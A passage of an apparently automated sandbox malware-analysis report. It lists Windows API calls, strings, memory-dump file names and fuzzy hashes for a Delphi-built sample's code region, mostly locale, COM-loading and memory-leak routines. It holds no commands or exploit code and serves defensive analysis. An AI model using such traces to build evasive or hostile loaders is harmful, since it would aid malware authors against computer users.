                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000), ref: 027C5A17
                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338), ref: 027C5A23
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 027C5A45
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                              • API String ID: 3245196872-1565342463
                                                                                                                                              • Opcode ID: da88ec2e5c93302add6b72a70843508378e0f22288ac2a5674df74b972b1d388
                                                                                                                                              • Instruction ID: bae7811482e8058d0bebd8237b346457918fbf78fef57becf7b471e9a02269d3
                                                                                                                                              • Opcode Fuzzy Hash: da88ec2e5c93302add6b72a70843508378e0f22288ac2a5674df74b972b1d388
                                                                                                                                              • Instruction Fuzzy Hash: 33415C71E00659AFDB11DAF8CC88ADEB7ADEB08300FA445ADA548F7241D731EE448F54
                                                                                                                                              APIs
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027C5B94
                                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027C5BA1
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027C5BA7
                                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027C5BD2
                                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C19
                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C29
                                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C51
                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C61
                                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027C5C87
                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027C5C97
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                              • API String ID: 1599918012-2375825460
                                                                                                                                              • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                              • Instruction ID: 5aeec2c1326c19787b0f3fb9ea384fc6624d18afe0f3904ba71bd5bd081d8d5b
                                                                                                                                              • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                              • Instruction Fuzzy Hash: 5D317571E4021D2AEB36DAB4DC49BDFB7AD5B04380FA401FD9608F6185EA75EE448F50
                                                                                                                                              APIs
                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027C7F7D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DiskFreeSpace
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1705453755-0
                                                                                                                                              • Opcode ID: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                                                                                              • Instruction ID: 0c07c84805d7ad6d24c55b03b03b686b025260fa85c499b5ca48bb1283dbefcd
                                                                                                                                              • Opcode Fuzzy Hash: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                                                                                              • Instruction Fuzzy Hash: 7211D2B5E00209AFDB05CFA9C981DAFF7F9EFC8704B14C56DA505EB254E671AA01CB90
                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoLocale
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                              • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                                                                              • Instruction ID: fec753b062967bfd01023ab9c07d67117f239ed422796e8db86aa83daace2238
                                                                                                                                              • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                                                                              • Instruction Fuzzy Hash: AFE0D87570021817D312A9786C98DF6736DA75C311F20417EBD04D7340FEA09D404BE4
                                                                                                                                              APIs
                                                                                                                                              • GetVersionExA.KERNEL32(?,027EC106,00000000,027EC11E), ref: 027CB722
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Version
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1889659487-0
                                                                                                                                              • Opcode ID: cdd262826216f77dac0f49a339e63bbca6bffc414c857b027eaf60bf97deabf0
                                                                                                                                              • Instruction ID: d32df48ba484ddfdfc116ad99115424d1e5f5d7dbceae4ce2dbbfc69f19e0994
                                                                                                                                              • Opcode Fuzzy Hash: cdd262826216f77dac0f49a339e63bbca6bffc414c857b027eaf60bf97deabf0
                                                                                                                                              • Instruction Fuzzy Hash: 5BF09274944302DFCB60DF28D542A1577E9FB4D724F54892DE8999A380E7349414CB62
                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027CBDFA,00000000,027CC013,?,?,00000000,00000000), ref: 027CA7AB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoLocale
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                              • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                                                                              • Instruction ID: 7ca50a57e00320ac92d788659509005764e3f4987ececac923baf37ddcd3626d
                                                                                                                                              • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                                                                              • Instruction Fuzzy Hash: CFD05EA630E2642AA320656A2D94DBB5AECDAC97A2F20803EF948C6200D2008C0696F1
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LocalTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 481472006-0
                                                                                                                                              • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                                                                              • Instruction ID: c6f26b392baaec754d7c43ef94b3a9b7af7a6a2d1b49cf444c7f5532f8c3099d
                                                                                                                                              • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                                                                              • Instruction Fuzzy Hash: 79A0124040482001854037280C0213530445840720FD40F4868F8502D0ED1D012050D3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027CD225
                                                                                                                                                • Part of subcall function 027CD1F0: GetProcAddress.KERNEL32(00000000), ref: 027CD209
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                              • API String ID: 1646373207-1918263038
                                                                                                                                              • Opcode ID: 8d4371c30ab25ae1002aad4bcc044d4b40412a0515c243ae156ffd8c0d9acaf2
                                                                                                                                              • Instruction ID: b450f104a97c9a9bd65b517401c30870a92795ea39b1ed74e6152620448a6d4d
                                                                                                                                              • Opcode Fuzzy Hash: 8d4371c30ab25ae1002aad4bcc044d4b40412a0515c243ae156ffd8c0d9acaf2
                                                                                                                                              • Instruction Fuzzy Hash: AD410975A842445F523AAB7E7408467BBDAD688710373843FBA0CCB786DE30BC558E2D
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 027D6E66
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 027D6E77
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 027D6E87
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 027D6E97
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 027D6EA7
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 027D6EB7
                                                                                                                                              • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 027D6EC7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                              • API String ID: 667068680-2233174745
                                                                                                                                              • Opcode ID: 1779b30352ad2f041c68cf4edc1eb7cc79432c11d8f6be2c2109029f3d7d3fb9
                                                                                                                                              • Instruction ID: 5005f1cfac2debe00085470573f3c9fac8a18cf3af4bcaceeeed33c909504c40
                                                                                                                                              • Opcode Fuzzy Hash: 1779b30352ad2f041c68cf4edc1eb7cc79432c11d8f6be2c2109029f3d7d3fb9
                                                                                                                                              • Instruction Fuzzy Hash: 7DF045F0A89711AEBB11BF70BCC583B2F6EA955708324592DA5427D902DBB58D104FA8
                                                                                                                                              APIs
                                                                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 027C28CE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message
                                                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                              • API String ID: 2030045667-32948583
                                                                                                                                              • Opcode ID: fa553f612f91cd5816354babaccdb7826dba9a1c572f78de1145e2d83841373a
                                                                                                                                              • Instruction ID: f9a1358d3ea19e4e82e0fcdc3b829f6c0fe041bb7a3e95097b7c5b8423252512
                                                                                                                                              • Opcode Fuzzy Hash: fa553f612f91cd5816354babaccdb7826dba9a1c572f78de1145e2d83841373a
                                                                                                                                              • Instruction Fuzzy Hash: 4FA19130A042648BDB22AA3CCC88B99B6E5EB09754F2441FDDD49AB387CF7589C5CF51
                                                                                                                                              Strings
                                                                                                                                              • An unexpected memory leak has occurred. , xrefs: 027C2690
                                                                                                                                              • bytes: , xrefs: 027C275D
                                                                                                                                              • Unexpected Memory Leak, xrefs: 027C28C0
                                                                                                                                              • 7, xrefs: 027C26A1
                                                                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 027C2849
                                                                                                                                              • The unexpected small block leaks are:, xrefs: 027C2707
                                                                                                                                              • , xrefs: 027C2814
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                              • API String ID: 0-2723507874
                                                                                                                                              • Opcode ID: 7eb2bb2468dedad1a19334cc00c32470be6df886f32266ffe0db73d96c79f1e9
                                                                                                                                              • Instruction ID: 6d59e4d91374506a3c73fb787ca1be0f286f88d77ff4038c139a2db901fc31c5
                                                                                                                                              • Opcode Fuzzy Hash: 7eb2bb2468dedad1a19334cc00c32470be6df886f32266ffe0db73d96c79f1e9
                                                                                                                                              • Instruction Fuzzy Hash: BF719530A082588FDB22AA3CCC88BD9BAE5EB09714F2441EDD949E7283DF7549C5CF51
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32(00000000,027CC013,?,?,00000000,00000000), ref: 027CBD7E
                                                                                                                                                • Part of subcall function 027CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                              • API String ID: 4232894706-2493093252
                                                                                                                                              • Opcode ID: 779c384bd01bfe35f4f28df326c7bb6ba47350c6e42c70d7e982f378e83d42ce
                                                                                                                                              • Instruction ID: c0f2b439c7ef951bb6342c72a327c9056d45435175581703846440e5834a34ca
                                                                                                                                              • Opcode Fuzzy Hash: 779c384bd01bfe35f4f28df326c7bb6ba47350c6e42c70d7e982f378e83d42ce
                                                                                                                                              • Instruction Fuzzy Hash: 29617139B001489BDB02EBB4EC64A9FB7BBAB48301F71943EA101AB745DA35D9498F54
                                                                                                                                              APIs
                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 027DAE40
                                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 027DAE57
                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 027DAEEB
                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 027DAEF7
                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 027DAF0B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
